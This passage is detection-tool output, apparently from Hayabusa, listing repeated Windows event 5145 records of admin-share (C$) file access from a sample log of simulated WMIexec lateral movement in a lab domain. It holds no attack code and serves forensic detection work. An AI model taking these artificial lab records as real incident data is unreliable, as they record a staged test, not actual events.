Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 